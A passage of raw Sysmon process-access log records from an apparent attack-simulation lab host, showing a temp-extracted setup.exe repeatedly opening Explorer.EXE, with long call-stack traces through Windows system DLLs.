ll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 